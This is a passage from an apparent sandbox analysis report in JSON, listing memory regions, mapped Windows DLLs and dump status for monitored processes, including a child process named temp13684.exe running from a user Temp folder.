"start_va": 8791537221632, "timestamp": "00:01:44.948", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 6967296, "start_va": 8791538728960, "type": "region", "version": 1 }, "end_va": 8791545696255, "entry_point": 8791538728960, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\ee795155543768ea67eecddc686a1e9e\\System.Xml.ni.dll", "id": "region_737", "name": "system.xml.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\ee795155543768ea67eecddc686a1e9e\\system.xml.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791538728960, "timestamp": "00:01:44.956", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 8791604199424, "type": "region", "version": 1 }, "end_va": 8791604228095, "entry_point": 8791604199424, "filename": "\\Windows\\System32\\shfolder.dll", "id": "region_738", "name": "shfolder.dll", "norm_filename": "c:\\windows\\system32\\shfolder.dll", "region_type": "memory_mapped_file", "start_va": 8791604199424, "timestamp": "00:01:44.965", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\YBZ8BT~1\\AppData\\Local\\Temp13684.exe\" ", "filename": "c:\\users\\ybz8bt~1\\appdata\\local\\temp13684.exe", "id": "proc_3", "image_name": "temp13684.exe", "monitor_reason": "child_process", "monitored_id": 3, "origin_monitor_id": 2, "ref_parent_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000003-region_00000812-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_729", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_812", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:02:03.235", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000813-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_730", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_813", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:02:03.235", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_814", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:02:03.235", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000815-addr_0x0000000000050000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_731", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 589823, "entry_point": 0, "filename": null, "id": "region_815", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:02:03.239", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000816-addr_0x0000000000090000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_732", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_816", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:02:03.239", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1654783, "entry_point": 0, "filename": null, "id": "region_817", "name": "pagefile_0x0000000000190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1638400, "timestamp": "00:02:03.239", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 221184, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4415487, "entry_point": 4194304, "filename": "\\Users\\YBZ8BT~1\\AppData\\Local\\Temp13684.exe", "id": "region_818", "name": "temp13684.exe", "norm_filename": "c:\\users\\ybz8bt~1\\appdata\\local\\temp13684.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:02:03.239", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2004549632, "type": "region", "version": 1 }, "end_va": 2006290431, "entry_point": 2004549632, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_819", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2004549632, "timestamp": "00:02:03.240", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2006515712, "type": "region", "version": 1 }, "end_va": 2008088575, "entry_point": 2006515712, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_820", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2006515712, "timestamp": "00:02:03.240", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_821", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:02:03.324", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000822-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_733", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_822", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:02:03.324", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000823-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_734", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_823", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:02:03.325", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000824-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_735", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_824", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:02:03.325", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_825", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:02:03.325", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000826-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_736", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_826", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:02:03.326", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_827", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:02:03.326", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000828-addr_0x00000000001e0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_737", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 2490367, "entry_point": 0, "filename": null, "id": "region_828", "name": "private_0x00000000001e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1966080, "timestamp": "00:02:03.334", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1944715264, "type": "region", "version": 1 }, "end_va": 1945092095, "entry_point": 1944715264, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_829", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1944715264, "timestamp": "00:02:03.334", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1945108480, "type": "region", "version": 1 }, "end_va": 1945366527, "entry_point": 1945108480, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_830", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1945108480, "timestamp": "00:02:03.341", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945567232, "type": "region", "version": 1 }, "end_va": 1945599999, "entry_point": 1945567232, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_831", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945567232, "timestamp": "00:02:03.348", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000832-addr_0x00000000002a0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_738", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 3801087, "entry_point": 0, "filename": null, "id": "region_832", "name": "private_0x00000000002a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2752512, "timestamp": "00:02:03.364", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1978335232, "type": "region", "version": 1 }, "end_va": 1979449343, "entry_point": 1978335232, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_833", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1978335232, "timestamp": "00:02:03.365", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1984299008, "type": "region", "version": 1 }, "end_va": 1984585727, "entry_point": 1984299008, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_834", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1984299008, "timestamp": "00:02:03.533", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000835-addr_0x0000000077590000-size_0x00000000000fa000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_739", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1024000, "start_va": 2002321408, "type": "region", "version": 1 }, "end_va": 2003345407, "entry_point": 0, "filename": null, "id": "region_835", "name": "private_0x0000000077590000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002321408, "timestamp": "00:02:03.580", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000836-addr_0x0000000077690000-size_0x000000000011f000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_740", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1175552, "start_va": 2003369984, "type": "region", "version": 1 }, "end_va": 2004545535, "entry_point": 0, "filename": null, "id": "region_836", "name": "private_0x0000000077690000", "norm_filename": null, "region_type": "private_memory", "start_va": 2003369984, "timestamp": "00:02:03.580", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_837", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:02:03.606", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 4878335, "entry_point": 4456448, "filename": "\\Windows\\System32\\locale.nls", "id": "region_838", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 4456448, "timestamp": "00:02:03.607", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1959002112, "type": "region", "version": 1 }, "end_va": 1959170047, "entry_point": 1959002112, "filename": "\\Windows\\SysWOW64\\mprapi.dll", "id": "region_839", "name": "mprapi.dll", "norm_filename": "c:\\windows\\syswow64\\mprapi.dll", "region_type": "memory_mapped_file", "start_va": 1959002112, "timestamp": "00:02:03.607", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1962475520, "type": "region", "version": 1 }, "end_va": 1962557439, "entry_point": 1962475520, "filename": "\\Windows\\SysWOW64\\atl.dll", "id": "region_840", "name": "atl.dll", "norm_filename": "c:\\windows\\syswow64\\atl.dll", "region_type": "memory_mapped_file", "start_va": 1962475520, "timestamp": "00:02:03.615", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 1962606592, "type": "region", "version": 1 }, "end_va": 1962958847, "entry_point": 1962606592, "filename": "\\Windows\\SysWOW64\\certcli.dll", "id": "region_841", "name": "certcli.dll", "norm_filename": "c:\\windows\\syswow64\\certcli.dll", "region_type": "memory_mapped_file", "start_va": 1962606592, "timestamp": "00:02:03.624", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1968046080, "type": "region", "version": 1 }, "end_va": 1968095231, "entry_point": 1968046080, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_842", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1968046080, "timestamp": "00:02:03.635", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1968111616, "type": "region", "version": 1 }, "end_va": 1968504831, "entry_point": 1968111616, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_843", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1968111616, "timestamp": "00:02:03.642", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1969094656, "type": "region", "version": 1 }, "end_va": 1969737727, "entry_point": 1969094656, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_844", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1969094656, "timestamp": "00:02:03.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1971847168, "type": "region", "version": 1 }, "end_va": 1972895743, "entry_point": 1971847168, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_845", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1971847168, "timestamp": "00:02:03.663", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1973747712, "type": "region", "version": 1 }, "end_va": 1973788671, "entry_point": 1973747712, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_846", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1973747712, "timestamp": "00:02:03.722", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1973813248, "type": "region", "version": 1 }, "end_va": 1974095871, "entry_point": 1973813248, "filename": "\\Windows\\SysWOW64\\Wldap32.dll", "id": "region_847", "name": "wldap32.dll", "norm_filename": "c:\\windows\\syswow64\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1973813248, "timestamp": "00:02:03.729", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1974534144, "type": "region", "version": 1 }, "end_va": 1975189503, "entry_point": 1974534144, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_848", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1974534144, "timestamp": "00:02:03.740", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1979449344, "type": "region", "version": 1 }, "end_va": 1980616703, "entry_point": 1979449344, "filename": "\\Windows\\SysWOW64\\crypt32.dll", "id": "region_849", "name": "crypt32.dll", "norm_filename": "c:\\windows\\syswow64\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1979449344, "timestamp": "00:02:03.801", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1981415424, "type": "region", "version": 1 }, "end_va": 1982398463, "entry_point": 1981415424, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_850", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1981415424, "timestamp": "00:02:03.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1982398464, "type": "region", "version": 1 }, "end_va": 1982988287, "entry_point": 1982398464, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_851", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1982398464, "timestamp": "00:02:03.845", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1985675264, "type": "region", "version": 1 }, "end_va": 1986031615, "entry_point": 1985675264, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_852", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1985675264, "timestamp": "00:02:03.883", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1986265088, "type": "region", "version": 1 }, "end_va": 1986969599, "entry_point": 1986265088, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_853", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1986265088, "timestamp": "00:02:03.946", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001702911, "entry_point": 2001600512, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_854", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:02:03.960", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 2006319104, "type": "region", "version": 1 }, "end_va": 2006368255, "entry_point": 2006319104, "filename": "\\Windows\\SysWOW64\\msasn1.dll", "id": "region_855", "name": "msasn1.dll", "norm_filename": "c:\\windows\\syswow64\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 2006319104, "timestamp": "00:02:03.967", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_856", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:02:03.974", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_857", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:02:03.975", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000858-addr_0x00000000005f0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_741", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 6225920, "type": "region", "version": 1 }, "end_va": 6291455, "entry_point": 0, "filename": null, "id": "region_858", "name": "private_0x00000000005f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6225920, "timestamp": "00:02:03.992", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6291456, "type": "region", "version": 1 }, "end_va": 7897087, "entry_point": 0, "filename": null, "id": "region_859", "name": "pagefile_0x0000000000600000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6291456, "timestamp": "00:02:03.992", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1982988288, "type": "region", "version": 1 }, "end_va": 1983823871, "entry_point": 1982988288, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_860", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1982988288, "timestamp": "00:02:03.992", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988689919, "entry_point": 1988296704, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_861", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:02:04.001", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000862-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_742", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_862", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:02:04.014", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000863-addr_0x0000000000030000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_743", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 200703, "entry_point": 0, "filename": null, "id": "region_863", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:02:04.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 7929856, "type": "region", "version": 1 }, "end_va": 9506815, "entry_point": 0, "filename": null, "id": 